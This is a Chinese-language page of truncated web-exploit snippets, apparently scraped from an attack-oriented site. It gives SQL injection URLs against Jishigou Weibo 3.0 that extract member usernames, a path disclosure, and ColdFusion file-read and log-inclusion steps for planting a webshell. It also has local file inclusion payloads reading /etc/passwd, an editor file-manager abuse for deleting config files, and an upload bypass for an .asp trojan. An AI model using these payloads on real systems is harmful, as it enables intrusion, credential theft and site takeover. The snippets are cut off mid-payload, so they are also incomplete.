记事狗微博3.0 漏洞
不解释,你懂得! https://www.webshell.cc/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e...
不解释,你懂得! https://www.webshell.cc/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e...
暴路径: https://www.webshell.cc/modules/admin/tttuangou.mod.php 利用: https://www.webshell.cc/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5...
我们知道Acunetix WVS可以对网站进行安全性评估,那么怎么能批量扫描呢?游侠(www.youxia.org)在测试WVS 8 BETA2的时候发现WVS居然支持WEB管理,还是很方便的。 打开Acunetix WVS,点New Scan,在弹出来的界面可以看到有三个选项: 最下面一个:如果你想扫描一个网站列表,使用Acunetix计划任务,访问http://localhost:8181...
近日有信息显示当前包括PHP、Java、Ruby在内的很多语言版本存在漏洞,PHP官方开发组成员Laruence表示攻击者可以通过构造Hash冲突实现拒绝服务攻击,并提供了实例。这个攻击方法危害很高,攻击成本也很小,一个台式机可以轻松搞垮数十台、上百台服务器。 此漏洞一出,相当于随便一个攻击者就可以DDoS掉世界上的大部分网站!危害等级绝对是核弹级别。因此,PHP官方开发组紧急发布了补丁,请大家尽...
路径为:https://www.webshell.cc/editors/tiny_mce/plugins/ImageManager/manager.php?b=/home/salehots/public_html/ 比较鸡肋,不是所有的网站都有用Tiny_mce,不过放到字典里扫描下还是可以扫出几个的。 可以编辑JPG,当然也可有删除文件的功能。 目前想到的就是删除配置文件,比如博客的配置文件,然后...
1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码 2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL https://www.webshell.cc/index.cfm?action=../../../../../../../../../../CFu...
很傻比的一漏洞 必须开启缓存才能利用 先看代码 book.php $kd_cachedir = "./cache"; if($kd_book_cache=="ture"){//缓存必须开启 $lastflesh = @filemtime($kd_cachedir."/book$shuid.html"); // echo $lastflesh; if(!file_exists("./cache/bo...
代码: <?php $page=$_GET[page]; include($page.'php'); ?> 你可以这样使用 https://www.webshell.cc/index.php?page=../etc/passwd https://www.webshell.cc/index.php?page=../../../etc/passwd http://w...
https://www.webshell.cc/syWebEditor/...to&fileType=gif|jpg|png|&filePathType=1&filePath=/PhotoFile/ProFile/ 可以浏览目录的,下面有个上传文件,打开,上传一张jpg小马,然后重命名,1.asp。然后上传抓包, 保存txt,后面加个 空格 用winhex打开...